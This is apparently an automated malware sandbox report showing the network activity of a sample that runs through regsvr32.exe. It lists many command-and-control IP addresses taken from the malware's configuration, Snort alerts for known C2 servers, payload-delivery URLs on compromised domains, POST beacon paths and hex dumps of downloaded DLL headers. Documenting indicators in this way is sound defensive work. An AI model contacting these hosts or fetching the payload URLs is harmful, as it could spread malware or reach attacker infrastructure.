Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic	TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic	TCP traffic: 192.168.2.3:49703 -> 81.68.152.197:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 45.63.99.23 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 173.255.211.88 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:63177 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49705 -> 173.255.211.88:443
Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49709 -> 45.63.99.23:7080
Source: Traffic	Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.3:49712 -> 182.162.143.56:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 173.255.211.88:443
Source: Malware configuration extractor	IPs: 45.63.99.23:7080
Source: Malware configuration extractor	IPs: 182.162.143.56:443
Source: Malware configuration extractor	IPs: 91.187.140.35:8080
Source: Malware configuration extractor	IPs: 212.24.98.99:8080
Source: Malware configuration extractor	IPs: 119.59.103.152:8080
Source: Malware configuration extractor	IPs: 45.235.8.30:8080
Source: Malware configuration extractor	IPs: 172.104.251.154:8080
Source: Malware configuration extractor	IPs: 72.15.201.15:8080
Source: Malware configuration extractor	IPs: 169.57.156.166:8080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 213.239.212.5:443
Source: Malware configuration extractor	IPs: 164.90.222.65:443
Source: Malware configuration extractor	IPs: 201.94.166.162:443
Source: Malware configuration extractor	IPs: 94.23.45.86:4143
Source: Malware configuration extractor	IPs: 183.111.227.137:8080
Source: Malware configuration extractor	IPs: 186.194.240.217:443
Source: Malware configuration extractor	IPs: 107.170.39.149:8080
Source: Malware configuration extractor	IPs: 147.139.166.154:8080
Source: Malware configuration extractor	IPs: 5.135.159.50:443
Source: Malware configuration extractor	IPs: 206.189.28.199:8080
Source: Malware configuration extractor	IPs: 104.168.155.143:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 82.223.21.224:8080
Source: Malware configuration extractor	IPs: 103.43.75.120:443
Source: Malware configuration extractor	IPs: 103.132.242.26:8080
Source: Malware configuration extractor	IPs: 139.59.56.73:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 202.129.205.3:8080
Source: Malware configuration extractor	IPs: 167.172.199.165:8080
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 209.97.163.214:443
Source: Malware configuration extractor	IPs: 167.172.253.162:8080
Source: Malware configuration extractor	IPs: 1.234.2.232:8080
Source: Malware configuration extractor	IPs: 159.65.88.10:8080
Source: Malware configuration extractor	IPs: 95.217.221.146:8080
Source: Malware configuration extractor	IPs: 153.92.5.27:8080
Source: Malware configuration extractor	IPs: 91.207.28.33:8080
Source: Malware configuration extractor	IPs: 188.44.20.25:443
Source: Malware configuration extractor	IPs: 153.126.146.25:7080
Source: Malware configuration extractor	IPs: 163.44.196.120:8080
Source: Malware configuration extractor	IPs: 172.105.226.75:8080
Source: Malware configuration extractor	IPs: 115.68.227.76:8080
Source: Malware configuration extractor	IPs: 159.65.140.115:443
Source: Malware configuration extractor	IPs: 139.59.126.41:443
Source: Malware configuration extractor	IPs: 197.242.150.244:8080
Source: Malware configuration extractor	IPs: 45.176.232.124:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 149.56.131.28:8080
Source: Malware configuration extractor	IPs: 79.137.35.198:8080
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 160.16.142.56:8080
Source: Malware configuration extractor	IPs: 159.89.202.34:443
Source: Malware configuration extractor	IPs: 185.4.135.165:8080

Source: Joe Sandbox View	ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
Source: Joe Sandbox View	ASN Name: INPL-IN-APIshansNetworkIN INPL-IN-APIshansNetworkIN

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3

Source: global traffic	HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56
Source: global traffic	HTTP traffic detected: POST /qqvehgyxm/bitss/ktcpnaio/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 304Host: 182.162.143.56

Source: Joe Sandbox View	IP Address: 110.232.117.186 110.232.117.186
Source: Joe Sandbox View	IP Address: 103.132.242.26 103.132.242.26

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:26:51 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveX-Powered-By: PHP/7.1.5Set-Cookie: 637136ebdcf92=1668364011; expires=Sun, 13-Nov-2022 18:27:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:26:51 GMTExpires: Sun, 13 Nov 2022 18:26:51 GMTContent-Disposition: attachment; filename="EvvmhfKiKFhKrSuHfBq.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?lllllll/ll2ll"l
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:27:03 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveSet-Cookie: 637136f7d44c4=1668364023; expires=Sun, 13-Nov-2022 18:28:03 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:27:03 GMTExpires: Sun, 13 Nov 2022 18:27:03 GMTContent-Disposition: attachment; filename="2yXcjy57oZTTUNweDidCGUY.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f6 07 00 00 00 e0 06 00 00 08 00 00 00 94 06 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?ll

Source: global traffic	HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49709 -> 45.63.99.23:7080

Source: unknown

Network traffic detected: IP country count 24

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Nov 2022 18:26:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33

Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415143218.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F
Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012973980.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416244353.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/tkafmhcgcid/
